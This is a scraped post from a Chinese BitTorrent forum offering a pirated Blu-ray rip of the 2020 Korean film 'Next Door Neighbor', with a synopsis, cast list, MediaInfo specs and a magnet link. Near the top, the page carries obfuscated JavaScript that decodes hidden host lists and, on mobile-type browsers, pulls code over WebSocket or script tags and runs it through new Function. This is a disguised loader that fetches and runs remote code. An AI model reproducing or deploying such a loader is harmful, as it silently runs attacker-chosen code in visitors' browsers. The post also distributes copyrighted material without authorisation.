邻居[简繁字幕]Next.Door.Neighbor.2020.1080p.BluRay.x264.DTS-迅雷下载 13.77GB

版主小s 2月前 2492

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 邻居 / 近邻 / Best Friend
◎片  名 ????
◎年  代 2020
◎产  地 韩国
◎类  别 剧情 / 悬疑 / 犯罪
◎语  言 韩语
◎上映日期 2020-11-25(韩国)
◎IMDb链接 https://www.imdb.com/title/tt6985320/
◎豆瓣评分 6.7/10 (2187人评价)
◎豆瓣链接 https://movie.douban.com/subject/27068597/
◎片  长 130分钟(韩国)
◎导  演 李焕庆 Hwan-kyeong Lee (id:1319978)
◎演  员 郑宇 Woo Jeong (id:1330454)
       吴达洙 Dal-su Oh (id:1203077)
       金熙元 Hae-won Kim (id:1321571)
       李侑菲 Yoo-Bi Lee (id:1324718)
       郑熙泰 Hee-tae Jung (id:1378175)
       池承炫 Ji Seung-hyeon (id:1383538)
       金炳哲 Byeong-cheol Kim (id:1372400)
       赵贤哲 Hyun-Chul Cho (id:1380429)
       金宣敬 Sun-kyung Kim (id:1112296)
       廉惠兰 Yum Hye-ran (id:1378885)
       郑贤俊 Hyun-joon Jung (id:1420959)
       金基天 Ki-cheon Kim (id:1339796)
       黄炳国 Byung-gook Hwang (id:1389460)
       朴哲民 Cheol-min Park (id:1218750)
       沈利煐 Yi-yeong Shim (id:1240306)

◎标  签 政治 / 韩国 / 韩国电影 / 剧情 / 2020 / 悬疑 / 郑宇 / 李焕庆

◎简  介
  故事讲述被软禁在家中的预备大选竞选人和秘密监视邻居的一举一动的国家秘密情报要员,以及隔着一道墙的两个极端职业男子之间可疑而又隐秘的交易。

  1. General
  2. Unique ID                                : 143072690445013157046466461427105706430 (0x6BA2CC418CBBB163BD41A2E4E126B1BE)
  3. Complete name                            : [email protected]kv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 13.8 GiB
  7. Duration                                 : 2 h 9 min
  8. Overall bit rate                         : 15.2 Mb/s
  9. Encoded date                             : UTC 2021-07-17 09:12:15
  10. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Codec ID                                 : V_MPEG4/ISO/AVC
  21. Duration                                 : 2 h 9 min
  22. Bit rate                                 : 13.6 Mb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 804 pixels
  25. Display aspect ratio                     : 2.40:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Scan type                                : Progressive
  32. Bits/(Pixel*Frame)                       : 0.368
  33. Stream size                              : 12.4 GiB (90%)
  34. Writing library                          : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]
  35. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.5000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  36. Language                                 : Korean
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. ID in the original source medium         : 4352 (0x1100)
  42. Format                                   : DTS
  43. Format/Info                              : Digital Theater Systems
  44. Codec ID                                 : A_DTS
  45. Duration                                 : 2 h 9 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 1 509 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : C L R Ls Rs LFE
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 93.750 FPS (512 SPF)
  52. Bit depth                                : 24 bits
  53. Compression mode                         : Lossy
  54. Stream size                              : 1.37 GiB (10%)
  55. Language                                 : Korean
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Text #1
  60. ID                                       : 3
  61. ID in the original source medium         : 4610 (0x1202)
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 2 h 4 min
  67. Bit rate                                 : 24.0 kb/s
  68. Count of elements                        : 3421
  69. Stream size                              : 21.3 MiB (0%)
  70. Title                                    : 简中
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Original source medium                   : Blu-ray
  75. Text #2
  76. ID                                       : 4
  77. ID in the original source medium         : 4611 (0x1203)
  78. Format                                   : PGS
  79. Muxing mode                              : zlib
  80. Codec ID                                 : S_HDMV/PGS
  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  82. Duration                                 : 2 h 4 min
  83. Bit rate                                 : 24.4 kb/s
  84. Count of elements                        : 3421
  85. Stream size                              : 21.6 MiB (0%)
  86. Title                                    : 繁中
  87. Language                                 : Chinese
  88. Default                                  : No
  89. Forced                                   : No
  90. Original source medium                   : Blu-ray
  91. Text #3
  92. ID                                       : 5
  93. ID in the original source medium         : 4609 (0x1201)
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 2 h 4 min
  99. Bit rate                                 : 29.8 kb/s
  100. Count of elements                        : 3436
  101. Stream size                              : 26.5 MiB (0%)
  102. Title                                    : 英语
  103. Language                                 : English
  104. Default                                  : No
  105. Forced                                   : No
  106. Original source medium                   : Blu-ray
  107. Text #4
  108. ID                                       : 6
  109. ID in the original source medium         : 4608 (0x1200)
  110. Format                                   : PGS
  111. Muxing mode                              : zlib
  112. Codec ID                                 : S_HDMV/PGS
  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  114. Duration                                 : 2 h 3 min
  115. Bit rate                                 : 22.1 kb/s
  116. Count of elements                        : 3369
  117. Stream size                              : 19.6 MiB (0%)
  118. Title                                    : 韩语
  119. Language                                 : Korean
  120. Default                                  : No
  121. Forced                                   : No
  122. Original source medium                   : Blu-ray
  123. Menu
  124. 00:00:00.000                             : 第 01 章
  125. 00:08:24.754                             : 第 02 章
  126. 00:20:32.356                             : 第 03 章
  127. 00:30:43.716                             : 第 04 章
  128. 00:41:31.906                             : 第 05 章
  129. 00:57:25.608                             : 第 06 章
  130. 01:13:41.291                             : 第 07 章
  131. 01:25:14.818                             : 第 08 章
  132. 01:39:01.143                             : 第 09 章
  133. 01:48:48.855                             : 第 10 章
  134. 02:01:27.488                             : 第 11 章
  135. 02:04:41.265                             : 第 12 章




TAGS 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:2F15913BDD1B44943F80E1E60515CDAE4B7F323F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回